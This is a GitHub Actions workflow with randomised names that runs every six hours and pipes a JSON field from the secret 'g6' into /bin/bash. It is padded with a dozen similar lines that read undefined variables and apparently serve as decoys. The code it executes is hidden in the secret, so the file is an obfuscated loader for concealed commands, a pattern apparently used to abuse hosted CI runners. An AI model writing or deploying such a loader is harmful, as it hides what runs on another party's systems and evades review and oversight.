name: hebaise4756
on:
  workflow_dispatch:
  schedule:
    - cron: '24 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hebaise4756
        env:
          g6: ${{ secrets.g6 }}
        run: |
          echo $g6 | jq -r .u6 | /bin/bash
          echo $y53980 | jq -r .foow1710 | /bin/bash
          echo $nv6 | jq -r .o06603 | /bin/bash
          echo $bi653 | jq -r .i359 | /bin/bash
          echo $ymzn17186 | jq -r .cte39750 | /bin/bash
          echo $zvgk18 | jq -r .fe92090 | /bin/bash
          echo $rv648 | jq -r .wnp968 | /bin/bash
          echo $eerx8 | jq -r .n2042 | /bin/bash
          echo $o1 | jq -r .ehb3202 | /bin/bash
          echo $hucs83 | jq -r .bc770 | /bin/bash
          echo $uo7 | jq -r .eww5348 | /bin/bash
          echo $ysqpm080 | jq -r .o463 | /bin/bash
          echo $ac7 | jq -r .tmvab68764 | /bin/bash

